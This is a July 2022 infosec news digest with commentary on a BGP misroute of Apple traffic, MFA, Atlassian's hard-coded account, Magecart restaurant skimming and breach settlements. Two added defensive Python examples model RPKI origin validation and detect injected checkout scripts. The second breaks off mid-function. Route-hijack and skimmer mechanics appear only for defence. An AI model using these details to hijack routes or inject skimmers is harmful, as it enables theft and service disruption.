Cybersecurity and Infosec News Headlines Update on July 31, 2022

Some of Apple’s Network Traffic was Routed Through Russian ISP

For a 12-hour stretch on July 26 and 27, Russia’s Rostelecom was announcing routes for portions of Apple’s network. It is not known whether this was a Border Gateway Protocol (BGP) misconfiguration or a deliberate hijacking.

Note

  • Never ascribe to malice what can be explained by a simple typo. Rostelecom owns 37.70.96.0/19 and rerouted 17.70.96.0/19 which is owned by Apple. Note the simple swapped digit in the beginning? Still, it would be nice if Apple would be able to roll out Route Origin Authorization, a feature that has made a real difference in some of these BGP route hijacks from causing more damage. And most of these “hijacks” are simple configuration mistakes. Change control is for people who can’t do incident response.
  • When you look at which groups have responsibility for availability and integrity of critical services, IT ops and Network ops really carry the bulk of the responsibility and authority, not security. But many of the tools and services that security uses will detect misconfigurations before IT/Network ops does. Integrated SOC/NOCs bring many benefits, next best thing is common or at least integrated tools being used across the groups.
  • Regardless of whether this rerouting was accidental or deliberate, this incident is another prime example of the importance of end-to-end encryption for all communications.
  • While there is no official statement from them, Apple did take action by advertising more specific routes to services during the time their traffic was being routed to Russia, which is about the only recourse you have when this happens. It’s unlikely we will learn if this was deliberate, accidental, or a trial balloon for future activities. Make sure that you and your network team have a plan for this scenario.
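The Route Origin Authorization point above, as an added example that is not part of the original digest: the Python below implements RFC 6811 origin validation and longest-prefix route selection over a constructed ROA table. It uses the two prefixes quoted in the note, assumed ASNs (AS714 for Apple, AS12389 for Rostelecom, as publicly registered) and an assumed Apple 17.0.0.0/8 aggregate, to show why the swapped-digit announcement would be marked Invalid, why advertising more-specifics was Apple’s fallback, and how a too-tight ROA max length would mark those defensive more-specifics Invalid as well.

```python
import ipaddress
from dataclasses import dataclass
from typing import Iterable, List, Tuple


@dataclass(frozen=True)
class Roa:
    """Route Origin Authorization: origin_as may announce prefix, or any
    sub-prefix no longer than max_length."""
    prefix: ipaddress.IPv4Network
    max_length: int
    origin_as: int


@dataclass(frozen=True)
class Announcement:
    """A BGP route as seen by a router: the prefix and its origin AS."""
    prefix: ipaddress.IPv4Network
    origin_as: int


def roa(prefix: str, max_length: int, origin_as: int) -> Roa:
    return Roa(ipaddress.ip_network(prefix), max_length, origin_as)


def ann(prefix: str, origin_as: int) -> Announcement:
    return Announcement(ipaddress.ip_network(prefix), origin_as)


def rov_state(a: Announcement, roas: Iterable[Roa]) -> str:
    """RFC 6811 origin validation: 'Valid', 'Invalid' or 'NotFound'."""
    covering = [r for r in roas if a.prefix.subnet_of(r.prefix)]
    if not covering:
        return "NotFound"      # no ROA covers the prefix: nothing to validate against
    for r in covering:
        if r.origin_as == a.origin_as and a.prefix.prefixlen <= r.max_length:
            return "Valid"
    return "Invalid"           # covered, but wrong origin or more specific than allowed


def best_origins(dest: str, anns: Iterable[Announcement], roas: Iterable[Roa],
                 drop_invalid: bool) -> Tuple[int, List[int]]:
    """Longest-prefix-match selection for one destination address.

    Returns (winning prefix length, sorted origin ASNs of the winning routes).
    With drop_invalid=True the router enforces ROV and discards Invalid routes.
    More than one ASN in the list means BGP tie-breakers (not modelled) decide."""
    ip = ipaddress.ip_address(dest)
    usable = [a for a in anns if ip in a.prefix
              and not (drop_invalid and rov_state(a, roas) == "Invalid")]
    if not usable:
        return (0, [])
    longest = max(a.prefix.prefixlen for a in usable)
    return (longest, sorted({a.origin_as for a in usable if a.prefix.prefixlen == longest}))


# Assumed ASNs (publicly registered): AS714 is Apple, AS12389 is Rostelecom.
APPLE_AS, ROSTELECOM_AS = 714, 12389

# Constructed ROA table. 37.70.96.0/19 and 17.70.96.0/19 are the prefixes from
# the digest; the covering Apple /8 ROA and its max length are assumptions.
ROAS = [
    roa("17.0.0.0/8", 20, APPLE_AS),           # Apple may announce down to /20
    roa("37.70.96.0/19", 19, ROSTELECOM_AS),   # Rostelecom's own block, exact length
]

APPLE_NORMAL = ann("17.0.0.0/8", APPLE_AS)               # assumed normal aggregate
INTENDED = ann("37.70.96.0/19", ROSTELECOM_AS)           # what Rostelecom meant to announce
TYPO = ann("17.70.96.0/19", ROSTELECOM_AS)               # the swapped digit: 37 -> 17
APPLE_MORE_SPECIFICS = [ann("17.70.96.0/20", APPLE_AS),  # Apple's recourse: split the
                        ann("17.70.112.0/20", APPLE_AS)]  # hijacked /19 into two /20s

# A ROA whose max length equals its prefix length also marks Apple's own
# defensive /20s Invalid: that trade-off is what the max length encodes.
STRICT_ROAS = [roa("17.0.0.0/8", 8, APPLE_AS)]


if __name__ == "__main__":
    victim = "17.70.100.1"  # constructed address inside the mis-announced /19
    for a in (INTENDED, TYPO, APPLE_NORMAL, *APPLE_MORE_SPECIFICS):
        print(f"{a.prefix!s:>16} from AS{a.origin_as:<6} -> {rov_state(a, ROAS)}")
    table = [APPLE_NORMAL, TYPO]
    print("no ROV, no more-specifics:", best_origins(victim, table, ROAS, False))
    print("ROV enforced:             ", best_origins(victim, table, ROAS, True))
    print("no ROV, Apple splits /19: ",
          best_origins(victim, table + APPLE_MORE_SPECIFICS, ROAS, False))
    print("strict ROA, ROV enforced: ",
          best_origins(victim, table + APPLE_MORE_SPECIFICS, STRICT_ROAS, True))
```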

Google Pushing Back Deadline to Deprecate Third-Party Cookies

Google now says it will support third-party cookies until the second half of 2024. Two years ago, the company said it would phase them out in 2022. Google says the decision was made based on “feedback we’ve received is the need for more time to evaluate and test the new Privacy Sandbox technologies before deprecating third-party cookies in Chrome.”

Note

  • Latest Facebook financial numbers seem to indicate that the lack of the ability to track users has material impact on the ad industrial complex. Google tried to replace cookies with FLoC (Federated Learning of Cohorts) but failed. Now they are trying “Topics” as a new tracking standard to balance privacy with Google’s need to accurately target and track the impact of ads it sells. We will see if that works, or if third-party cookies will stick around for a few more years.
  • The good news is even the Facebooks of the world and most US politicians are largely past the “privacy-denial” stage. The underlying revenue model for the Internet has to change from tricking people into exposing their personal information and then selling it. When cable TV needed more revenue than it could get from subscription services, cable TV introduced ads. The internet started with ads, and quickly moved to the selling personal info model to advertisers. However, many valuable services have found they can add subscription services for revenue and promise higher privacy as a large part of the consumer allure. It is very cool these days to see more software architects listing privacy as a key product requirement, and getting security involved vs. the other way around.
  • Recall Google first tried their FLoC solution which went over like a lead balloon, then in January of 2022, they rolled out the Topics API, and now we have the Privacy Sandbox, which will be available in Chrome 104 Stable at the beginning of August. This gives you a little over a year to test and provide feedback.

Multi-Factor Authentication Thwarts Ransomware Actors

Authorities in the European Union (EU) say they have seen cases in which multi-factor authentication stopped ransomware groups from proceeding with their attacks. Marijn Schuurbiers, head of operations at Europol’s European Cybercrime Centre (EC3), said, “In certain investigations, we saw [the attackers] trying to access companies – but as soon as they would hit two-factor authentication in this process, they would immediately drop this victim and go to the next.”

Note

  • In 2019, Microsoft published a study of 200M logins that shows even simple text message-based MFA prevented 99.9% of phishing attacks from succeeding. So, we really don’t need more evidence, but always good to highlight successes. But, just as “airplane successfully lands at airport, no drinks are even spilled” headlines wouldn’t get many clicks, the press has learned that any successful attack does. Always good in our field to highlight successes whenever possible.
  • Is MFA perfect? No. Can it be bypassed? Yes. However, time and time again MFA has proven to be one of the single most effective controls people can enable to protect their digital lives and data. As a security awareness professional, if I could teach people only one single behavior to protect themselves, enabling MFA would most likely be it.
  • While this anecdote highlights the importance of MFA in protecting against attacks, it also reflects the high number of targets available to criminals that they can readily drop one potential victim and move on to the next one with weaker security controls. It is analogous to the joke about not needing to outrun the bear but just needing to outrun the other potential victim. It’s important that we continue to encourage organisations to adopt MFA where they can and that vendors, particularly cloud service providers, adopt MFA as a default setting.
  • As the Palo Alto Unit 42 report shows, the number one thing to thwart attacks is MFA. Even if you have some form of MFA, make sure that you’ve chosen wisely, particularly if you have SMS- or phone-based MFA; while that is an awesome step in the right direction, you need to move to phishing-resistant forms of MFA.

EPA Will Introduce Cybersecurity Into its Reviews of Critical Water Facilities

The US Environmental Protection Agency (EPA) will issue a new rule that will expand their reviews of critical water facilities to include cybersecurity. Deputy National Security Advisor for Cyber and Emerging Tech Anne Neuberger says the White House is working toward legislation that would give agencies like the EPA greater authority to impose cybersecurity requirements for organizations that operate elements of the country’s critical infrastructure.

Note

  • The US Government’s 2023 fiscal year starts on October 1 and here’s my wish for their New Year’s resolution: *All* government agency reviews of IT systems for any reason should include cybersecurity requirements in those reviews. All entities accepting federal funds related to anything that runs software (firmware has software, too) should be subject to those requirements.
  • There is nothing like an external review to shine a light on anything swept under the rug. While these systems should already be secure, publishing a mandate and specific required standards to follow will empower staff seeking management support to better secure their operations. This also means when competing for this business, companies will have to factor in the cost of meeting these requirements commensurate with the criticality and sensitivity of the data and service provided. Such requirements, including review expectations, should be SOP on any contract. Make sure that you’re regularly monitoring that your contracted/outsourced services are performing as expected.

Report: Chinese Threat Actors Attempted to Infiltrate US Federal Reserve for Years

A report from the US Senate Committee on Homeland Security and Governmental Affairs “reveals a sustained effort by China, over more than a decade, to gain influence over the Federal Reserve and a failure by the Federal Reserve to combat this threat effectively.”

Note

  • The Chinese are very patient; remember they think about actions taking fifty or more years, while we in the US tend to think in four-year cycles, as in election cycles. They target acquisition of intellectual property. Consider not only background checks on employees, but also repeating those periodically to make sure employees have not been co-opted.

Unit 42: Vulnerability Disclosure to Exploit Time is Shrinking

According to a report from Palo Alto Networks Unit 42, the average time between a vulnerability being disclosed and it being exploited is shrinking. Attackers were detected scanning for vulnerabilities within 15 minutes of their disclosure. The report draws its data from 600 incident response cases.

Note

  • Nice attention-grabbing headline. And there is some truth to it. But the real answer, as so often, is: It depends. We had exploits being used against vulnerabilities within minutes of the vulnerability becoming known as far back as the “Witty Worm” (still one of my all-time favorites). But the real challenge nobody has a good answer for: How am I able to predict which vulnerabilities will be exploited quickly vs. which ones will never be exploited? Gazillions of sysadmin tears will be saved if someone can come up with an absolutely accurate way to tell which vulnerabilities are “patch now” vs. “don’t bother.”
  • The top three contributors to attacker success are lack of MFA, lack of EDR, and lack of patch management. While you’ve focused on endpoint and OS patching roll-out, don’t overlook the application layer on endpoints and servers. Ask when you can expect to MFA all externally facing services, then internal services – and don’t forget MFA on the desktop.

Two People Arrested for Disabling Spain’s Radiation Alert Sensors

Two former Spanish government contract workers have been arrested for allegedly breaking into the country’s radioactivity alert system and disabling a third of its sensors. The pair allegedly deleted the alert system web app from the General Directorate of Civil Protection and Emergencies (DGPGE) control center, then hacked the sensors. The incident occurred in the spring of 2021.

Note

  • Spain has a network of 800 gamma radiation sensors designed to detect and alert on excessive radiation from one of their seven nuclear reactors. The attackers took down 300 of these sensors using illegitimate access to the DGPGE network. While the specifics on the attack vectors are unclear, you can mitigate some risks by making sure that you expeditiously disable/delete accounts for non-active employees, to include monitoring for re-activation or recreation. Also make sure any external entry points are not only implemented using current security guidance, but also require MFA. Don’t forget about physical access scenarios.

EU Helped 1.5M Ransomware Victims

Europol says that authorities in the European Union (EU) have helped 1.5 million people and organizations regain data that had been encrypted with ransomware. The announcement was made on July 26, the sixth anniversary of the No More Ransom project, which brings law enforcement and IT companies together to help victims of ransomware.

Note

  • Nomoreransom.org is a solid effort, but the Vice piece states $1.5B was saved across 1.5M people overall. I couldn’t find any backup for the math – that works out to $1,000 per victim, which seems odd. Could be skewed by a few big ones but need to know how much of the $1.5B was in previously ridiculously inflated “crypto currencies.” Still, a good effort to point your users to for education about how to avoid attacks at home and how best to deal with ransom demands if they do get hit.
  • This project is a great example of how effective public/private partnerships can be in the fight against cybercrime. The No More Ransom project is a resource all in cybersecurity should be aware of; I know we have successfully used it over the past years to recover several victims of ransomware attacks. The site is available at www.nomoreransom.org.
  • To date, the group offers 136 free decryption tools for 165 ransomware variants including MAZE, REvil and GandCrab. Having a similar service supported by law enforcement worldwide would aid reporting and reduce likelihood of payment.

Another Microsoft 365 Outage

On July 28, admins in North America were reporting that they could not access the Microsoft 365 admin center. After looking into the situation, Microsoft determined that the incident affected a broader group of admins. The company has restarted “the affected infrastructure” and says the issue has been resolved.

Note

  • The silver lining is this time end-users were not impacted, even though being blocked from performing admin actions is bloody annoying. Microsoft’s preliminary response was, again, certain servers were performing below acceptable thresholds and they are working to optimize performance. When monitoring your service delivery components, make sure that you are equipped to communicate and respond commensurate with both your SLA and user expectations.

Cyberattack Prompts MSP NetStandard to Shut Down Cloud Services

Kansas-based managed service provider (MSP) NetStandard shut down its MyAppsAnywhere cloud services after discovering that the company was the victim of a cyberattack. The attack was detected on July 26.

Note

  • Service providers are high leverage targets for attacks. Use press coverage to show management that security should be involved in any procurement of 3rd party services, which includes cloud services.
  • Many of us may have a simulation exercise to determine how our organization will respond to a ransomware attack, but have you considered what your playbook should be should one of your critical suppliers or cloud service providers become a victim?
  • If you’re using an MSP, make sure that you’ve had a frank conversation about what a compromise would entail. Would that expose your data or other customers’ data as well? Make sure that you have the relationship and communication paths needed to not only handle incident communication but also verify that their security remains as promised.

Transparent Tribe adds new tools to its arsenal as it targets Indian colleges

Attackers target Ukraine using GoMet backdoor

Cisco Talos discovered an uncommon piece of malware targeting Ukraine, aimed at a large software development company whose software is used in various state organizations within Ukraine. Talos believes this campaign is likely sourced by Russian state-sponsored actors or those acting in their interests. As this firm is involved in software development, we cannot ignore the possibility that the perpetrating threat actor’s intent was to gain access to source a supply chain-style attack, though at this time, we do not have any evidence that they were successful. Cisco Talos confirmed that the malware is a slightly modified version of the open-source backdoor named “GoMet.” The malware was first observed on March 28, 2022. Read more: Attackers target Ukraine using GoMet backdoor

Users urged to patch Atlassian Confluence vulnerability immediately

Atlassian disclosed three critical vulnerabilities in its Confluence software last week, including one for a hardcoded password that was leaked on Twitter. The company urged users to immediately update to the latest version of the software or apply a mitigation measure. An attacker could use this hardcoded password to view all non-restricted pages within the Confluence user-group by default. Atlassian said in its advisory that the issue is expected to be exploited in the wild now that the exploit has been leaked online. The two other critical vulnerabilities affect almost all other Atlassian products.

New Windows 11 Default Policy to Help Prevent RDP Brute-Force Attacks

Microsoft has enabled a default policy in Windows 11 builds that is designed to help thwart brute-force Remote Desktop Protocol (RDP) attacks. Accounts will be locked for 10 minutes after 10 incorrect login attempts. The account lock setting is available in Windows 10 but is not enabled by default.

Note

  • Nice move by Microsoft. RDP has been called “Ransomware Deployment Protocol” for a reason. Sadly, it is still widely deployed without sufficient controls and Microsoft’s move will make it slightly less likely for a carelessly deployed system to be compromised.
  • Two security policies that have been common requirements that have been too often ignored or bypassed are lockout after failed attempts and requiring MFA on all remote access. Microsoft turning on lockout by default for RDP is a good thing, but turning on MFA for RDP obviates the need for lockout and stops more than just brute force attacks.
  • Account lockout is excellent, and you should enable it on all platforms which support it. Now go make sure that any internet facing RDP requires MFA, and is sufficiently monitored and otherwise secured to withstand malfeasance.
  • It is good to see a vendor like Microsoft making security by default the standard setting in its newer products. It has been a long time coming and I hope we see this initiative spread to many other settings and products, not just those offered by Microsoft but for other vendors too.
  • This control is not disruptive and might well be enabled by default.

HHS HC3 Urges Healthcare Sector Organizations to Consider Web App Security

The US Department of Health and Human Services (HHS) Health Sector Cybersecurity Coordination Center (HC3) has released web application security guidance for the health sector. The publication defines web applications in healthcare, describes types of web app attacks, suggests mitigations, and provides additional cybersecurity resources.

Note

  • Teaching web application security for a few years now, I am always surprised by the lack of awareness around common web application security threats. This isn’t just a healthcare problem, and we have to stop looking at it as a software/developer issue. Security teams not understanding web logs and how to recognize common attacks are as much part of the problem as missing SBOMs and developers not understanding the risks of DOM-based XSS.
  • Even if you’re not in the healthcare sector, read the HHS PDF below. The mitigations and protections should not come as a surprise – what may surprise you is where you’re not doing them. Make sure your WAF is not in learning mode, but actively blocking attacks; login services should employ MFA, with monitoring as well as impossible-access scenario detection and prevention. Make sure that your development testing requires issues found to be addressed, not merely noted.
  • This isn’t really guidance, it is a threat briefing from the HHS HC3 – a good basic presentation about web app security threats and controls but unfortunately no raising of the regulatory bar to force movement. It does include a nice list of web app security requirements from the HHS Cybersecurity Practices program that map to about 40 NIST Framework controls. If you are trying to justify increasing app security in 2023, use that as a checklist to point out compliance gaps.

FileWave MDM Vulnerabilities

Researchers from Claroty’s Team 82 have discovered and disclosed two critical vulnerabilities in FileWave’s mobile device management (MDM) system. The flaws, an authentication bypass issue and a hard-coded cryptographic key, can be remotely exploited to take control of vulnerable platforms. The flaws have been addressed in FileWave version 14.7.2.

Note

  • Web apps, again. A good old web application vulnerability in a piece of “security” software. No cloud involved here, just a good old web application vulnerability that is so boring that we would rather have it than spend the time learning how to do authorization properly.
  • Don’t think MDM only impacts my smartphone fleet. MDMs are managing Windows & Mac laptops, as well as your iPhones/iPads/Android tablets and smartphones. The exploit provides privileged access to a FileWave MDM, allowing for modifications across your fleet of managed devices. As such, you want to roll out the fixed version. You’re going to need to update all your components – servers, boosters, imaging, admin and client platform. The good news is it’s a series of simple package updates.

Update Questions for Confluence App Now

Last week, Atlassian disclosed several vulnerabilities, including a hard-coded password issue affecting the Questions for Confluence app. Atlassian has since reported that the password has been leaked online, which makes patching the app even more urgent.

Note

  • Too late. It’s probably already compromised if you had it exposed to the world. But that was probably just a honeypot anyway (at least it is now).
  • The hard coded password for the “disabledsystemuser” account has been published. Make sure you’ve deleted that account, and you monitor for it being recreated. This is a system account, so even if you remove the Atlassian product, the account remains. And yeah, apply the patches to your Atlassian products immediately.

CosmicStrand UEFI Firmware Rootkit

Researchers at Kaspersky have detailed their findings about a Unified Extensible Firmware Interface (UEFI) firmware rootkit they are calling CosmicStrand. In 2017, researchers from Qihoo360 published a blog about an earlier variant of the rootkit, which they called Spy Shadow Trojan.

Note

  • Long gone are the days of moving the jumper or dip switch to permit firmware updates. As such you were making sure the updates were pushed from verified sources. This malware appears to be an update performed on an already otherwise compromised system. Once installed the firmware includes the CSMCORE DXE driver which enables a legacy boot process, adding accounts to the OS along the way. The killer is that you cannot just re-install/replace the drive to eliminate UEFI firmware implants. If you’re lucky you can install known good firmware, but odds are you’re in a physical hardware replacement scenario.

SonicWall Releases Fixes for SQL Injection Vulnerability

SonicWall is urging users to upgrade Global Management System (GMS) and Analytic On-Prem products to address a critical SQL injection vulnerability. The issue is due to “improper neutralization of special elements used in an SQL command.” Users should upgrade to GMS 9.3.1-SP2-Hotfix-2 or later and Analytics 2.5.0.3-2520-Hotfix-1 or later.

Note

  • The likelihood of exploit can be reduced by deploying a WAF, but the right way to fix this is to deploy the update. Then look at how a WAF could help with this and other applications.
  • It is disappointing in the extreme that in 2022 we see a security vendor having to address a SQL Injection vulnerability in their product suite.

TSA Revises Pipeline Cybersecurity Requirements

The US Department of Homeland Security’s (DHS’s) Transportation Safety Administration (TSA) has issued revised cybersecurity requirements for pipeline operators. The revisions were made in response to industry requests for “more flexibility to meet the intended security outcomes.” The new pipeline cybersecurity directive takes effect on July 27 and expires on the same date in 2023.

Note

  • Two comments: (1) The “flexibility” added is largely by TSA changing to a “tell us what you will do and then we will audit to make sure you do what you say” approach which usually sets a very low bar for security. Good news is TSA has mandatory requirements for what must be included that cover the important basic hygiene elements. (2) There is a deadline for operators to submit plans, but there did not appear to be a deadline around TSA review and approval. Does TSA have the staff or contractor to do meaningful review with timely turn-around?
  • The initial version of the requirements, from July 2021, resulted in a flurry of 380 exception requests, an indication that this needed to be revisited. This is intended to be a more flexible framework to incorporate variances in environment and implementation. Operators have 21 days to submit a plan to implement the new requirements. Once approved, they are expected to actually implement them. Requirements include segmentation, MFA, incident response plans, auditing, and logging capabilities.

T-Mobile Will Pay $500M Over Data Breach

T-Mobile has agreed to pay at least $500 million to settle legal action over a 2021 data breach that compromised information belonging to nearly 77 million customers. $350 million will go toward a settlement fund for members of a class action lawsuit and associated legal fees. T-Mobile has also agreed to spend at least $150 million to improve its security practices.

Note

  • These fines have been ramping up on a $/impacted user basis. Uber’s $148M fine in 2016 was $2.6/user, Equifax in 2017 was $4.29/user and T-Mobile’s fine for the 2021 breach is $6.49/user. The costs the breached companies paid outside of the fines is hard to define but typically in these mega breaches it is in the $10–25/record exposed range – always more than the fine. The fines are useful to show CXOs and boards – in the vast majority of breaches, the cost of fines alone is much higher than what it would have cost to avoid or minimize the incident.
  • If the settlement is split equally among the 77 million customers, they get about $5 each. T-Mobile is partnering with Mandiant, Accenture and KPMG to improve their cybersecurity posture and conducting about 900,000 training courses for employees and partners. As this 2021 incident is the fifth publicly acknowledged security breach in four years, it’ll be interesting to see how effective these measures are.

Uber Will Not Face Federal Prosecution Over 2016 Data Breach

Uber has publicly acknowledged that it attempted to cover up a 2016 data breach. The admission was made as part of a non-prosecution agreement with the US Department of Justice (DoJ). According to the agreement, the incident was investigated and disclosed by an executive leadership team that took the reins of the company the year after the breach. In addition, Uber “has invested substantial resources to significantly restructure and enhance the company’s compliance, legal, and security functions.”

Note

  • The breach was due to attackers obtaining an access key which allowed them access to Uber’s databases of users and drivers. The information for 50 million users and 7 million drivers was exposed. Uber not only paid a ransom, but also around $148 million in settlements of civil litigation. The lesson here is to report incidents as required.
  • All CSOs should watch this case very carefully to see what legal liability their role could be exposed to by decisions made when dealing with a breach.

FBI Warns on Targeted Attacks and AI

The FBI is worried that cyberattacks are becoming more sophisticated and targeted, and that AI will increasingly be used in attacks in the next few years. They’re specifically worried about attackers being able to target and disable an entire industry, like commercial real estate, and they worry that deepfakes will become indiscernible from real content within ~2 years. Read more: The growth in targeted, sophisticated cyberattacks troubles top FBI cyber official

Ukrainian Radio Station Hijacked to Spread Misinformation

Hackers out of Russia penetrated a Ukrainian radio station and broadcasted fake updates saying that President Zelenskiy was in critical condition and in intensive care. The president had to release a video to counter the false claims. Read more: Hackers breach Ukrainian radio network to spread fake news about Zelenskiy

LinkedIn Tops Phishing

Checkpoint says LinkedIn is still the most impersonated phishing brand, followed by Microsoft, DHL, Amazon, and Apple for the top 5. And LinkedIn came in at 45% while second place Microsoft was at 13%. Read more: LinkedIn remains the most impersonated brand in phishing attacks

Dragos Uncovers PLC Campaign

Dragos has uncovered an interesting password-stealing campaign targeted at industrial engineers and operators. The campaign used a technique to extract passwords from the PLC firmware directly and join the system into a botnet. Read more: Ingenious campaign aimed at hacking engineer’s computer brought to light by Dragos

Entrust Breach

Computer security company Entrust has been hit with a ransomware attack. Multiple government entities use Entrust for Identity and Access Management, including DoE, DHS, Department of the Treasury, and others. The attack took place in June and the ransomware group evidently purchased access through an access broker. Read more: Digital security giant Entrust breached by ransomware gang

Atlassian Security Updates Include Fix for Hard-Coded Password Issue

Atlassian’s security advisories for July 2022 include fixes for a hard-coded password vulnerability affecting the Questions for Confluence app for Confluence Server and Data Center. The app installs a user account, “disabledsystemuser,” that admins can use to migrate data to the Confluence Cloud. Atlassian notes that “a remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access any pages the confluence-users group has access to.” Users are urged to update to Questions for Confluence versions 2.7.38 and 3.0.5. Users can also disable or delete the account. A second advisory addresses multiple servlet filter vulnerabilities in eight of its products.

Note

  • Not just for the hardcoded password: these vulnerabilities are serious and the fixes need to be applied expeditiously. These Atlassian products are often central to organizations’ software development process and a compromise could endanger this software.
  • When a physical substance (asbestos, lead, Red Dye #2, etc.) is found to be poisonous or dangerous, society can move pretty quickly to ban it. But, bad habits (eating too much fat/sugar/salt, leaving the keys in the ignition, buffer overflows in code, hard coded passwords in apps, etc.) are much harder to eliminate. Every modern app testing tool detects the worst software coding/app security mistakes – require all software suppliers to show evidence of having run such tools or to be part of programs such as Veracode Verified, where the app test software vendor does it for them.
  • Atlassian included this account to aid cloud migration, and while considerate, including either hard coded credentials or authorization keys has repeatedly been found to be a source of exploitation. Make sure that your Atlassian products don’t include the disabledsystemuser account, delete it if found, creating fresh credentials for migration only for the duration of the project if you elect to migrate. Add checking for (and removing) disabled accounts “out of the box” right next to changing default passwords in your software installation/update process.

Google Pulls Spyware-Infested Apps from Play Store

Google has removed 60 Android apps from the Google Play Store after they were found to contain malware. The apps in question were being used to spread Joker, Facestealer, Coper, and Autolycos malware.

Note

  • Google seems to have been very slow to remove this “fleeceware” and has not made a public statement providing justification. I think something like 3700 apps per day are added to the 3.5M or so apps in Google play – human inspection isn’t really feasible to augment all the automated checks. The good news is Android and iOS do have what Windows and Linux lack – by default software whitelists (app stores) that greatly raise the bar against malware.
  • These apps can either install premium dialers, such as Joker, which signs users up for expensive monthly subscription plans, or install malware. While there is some screening for malware when publishing content to the Google Play Store, the Joker-spreading apps keep being reintroduced as they are obfuscating their malicious activity by changing code, execution methods and payload retrieval processes/techniques. As always, beware of over-permissioned apps; only download apps from known developers and either your corporate or Google app stores. Play Protect will remove the malicious applications; you need to check your device for premium subscriptions you didn’t authorize and cancel them.

Read more in

Microsoft Resumes Office Macro Blocking

Microsoft has resumed blocking Office macros by default. It introduced the feature earlier this year, but recently rolled it back due to customer response. Microsoft wrote, “Based on our review of customer feedback, we’ve made updates to both our end user and our admin documentation to make clearer what options you have for different scenarios.”

Note

  • For organizations who experienced issues with macro blocking when Microsoft first started doing it: You will still be able to set your own policies, and Microsoft updated its guidance. As long as you set a specific policy manually, this change will not override it.
  • If you'd already configured the "Block macros from running in Office files from the Internet" policy, that setting controls the blocking behavior. Consult the updated Microsoft guidance on how to allow macros from SharePoint or network shares to minimize impact; in general you want macros disabled by default.

Read more in

IoCs for Malware Targeting Ukrainian Networks

US Cyber Command (CYBERCOM) and Ukraine’s Security Service have jointly issued a list of 20 indicators of compromise (IoC) for attacks that have been targeting Ukrainian networks. In addition, Mandiant has published a related “blog to provide insight and context on a sampling of malicious activity targeting Ukrainian entities during the ongoing war.”

Note

  • While these attacks are targeting Ukrainian entities, we know that there can be collateral damage, so better safe than sorry: include the IoCs in your SIEM. Also include the indicators from the Mandiant report on the GRIMPLANT and GRAPHSTEEL spear-phishing campaign.

Read more in

CISA Warns of Vulnerabilities in GPS Tracker

The US Cybersecurity and Infrastructure Security Agency (CISA) has published an advisory warning of multiple vulnerabilities in MiCODUS GPS tracker devices. The issues include use of hard-coded credentials; improper authentication; cross-site scripting, and authorization bypass through user-controlled keys. The vulnerabilities were discovered by researchers at BitSight.

Note

  • The vulnerable devices do not just allow for tracking of the vehicle, but could also be used to disable them. This could become a safety issue. The inaction of the vendor is appalling and should be taken as a clear sign to not procure any more of these products.

Read more in

NIST and Cloud Security Alliance Offer Guidance for Healthcare Sector

The US National Institute of Standards and Technology (NIST) has published an updated draft of its healthcare cybersecurity guidance, focusing on Health Insurance Portability and Accountability Act (HIPAA) compliance. NIST is accepting public comments through September 21, 2022. The Cloud Security Alliance (CSA) has published a document designed to help the healthcare sector address third-party vendor risk management.

Note

  • I'm not a big fan of 152-page documents that focus on how to comply with regulations vs. how to protect data/systems/services and demonstrate compliance as a byproduct of that. But, more than half of SP800-66 is reference documents and section 5 (which is still 47 pages long) is a good source of questions that need to be answered to secure public health information.
  • The goal is to augment the guidance to include more resources to help those struggling to implement the necessary security posture for HIPAA compliance. If you’re a practitioner in this space, provide feedback to increase the relevance of the guides and resources.

Read more in

Magecart Skimming Attacks Targeting Online Restaurant Ordering Services

Magecart skimming campaigns have been targeting MenuDrive, Harbortouch, and InTouchPOS online restaurant ordering services. The campaigns were detected by researchers from Recorded Future’s Insikt Group; more than 50,000 payment card records from more than 300 restaurants have been compromised.

Note

  • Attackers seek to leverage our increased use of online ordering from restaurants. The attackers are targeting the POS, not the individual restaurants. As a subscriber to an online ordering service, verify that they are scanning server and browser components and that they are following PCI-DSS requirements to inventory all JavaScript and traffic in and out of their website. Ask for proof of activities related to detection of Magecart and other similar threats.
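The inventory the note above asks your ordering provider for is something you can also run yourself against a rendered checkout page. The following is an added example, not code from the Recorded Future report or from any of the named platforms: it lists every script element on a page, flags scripts that come from hosts outside an approved list, approved hosts that ship without a Subresource Integrity (SRI) attribute, and inline scripts that must be matched against a known-good inventory, and it checks a stored copy of a script against its SRI hash offline. The sample page, the approved host list and the host names are all constructed for the example.

```python
"""Script inventory and SRI check for a checkout page (added example).
Standard library only; the page, hosts and approved list below are constructed."""
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the site owner has deliberately approved (assumption for the example).
ALLOWED_HOSTS = {"shop.example", "cdn.example"}

# Constructed sample checkout page: a first-party script with SRI, a third-party
# script without SRI, an inline script, and a script injected from an unknown
# host (the shape a Magecart injection usually takes).
SAMPLE_PAGE = """<html><head>
<script src="https://cdn.example/app.js" integrity="sha384-AAAA" crossorigin="anonymous"></script>
<script src="https://widgets.third-party.example/menu.js"></script>
<script>window.cfg = {};</script>
</head><body>
<script src="https://static-cdn-loader.example/jquery-ui.js"></script>
</body></html>"""


class ScriptInventory(HTMLParser):
    """Collect every <script> element: src, integrity attribute and, for inline
    scripts, the script body (to compare against an approved inventory)."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_inline = False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        self.scripts.append({"src": a.get("src"), "integrity": a.get("integrity"), "inline": ""})
        self._in_inline = a.get("src") is None

    def handle_data(self, data):
        if self._in_inline and self.scripts:
            self.scripts[-1]["inline"] += data

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline = False


def inventory(html):
    p = ScriptInventory()
    p.feed(html)
    return p.scripts


def findings(html, allowed_hosts=ALLOWED_HOSTS):
    """Return (host, reason) pairs that need review."""
    out = []
    for s in inventory(html):
        if s["src"] is None:
            out.append(("<inline>", "inline script: compare against approved inventory"))
            continue
        host = urlparse(s["src"]).hostname or ""
        if host not in allowed_hosts:
            out.append((host, "script from host not in approved inventory"))
        elif not s["integrity"]:
            out.append((host, "approved host but no SRI integrity attribute"))
    return out


def sri_for(body: bytes, algo: str = "sha384") -> str:
    """Build the integrity value for a known-good copy of a script."""
    return algo + "-" + base64.b64encode(hashlib.new(algo, body).digest()).decode()


def sri_matches(body: bytes, integrity: str) -> bool:
    """True if the body matches any of the hashes in an integrity attribute."""
    for token in integrity.split():
        algo, _, b64 = token.partition("-")
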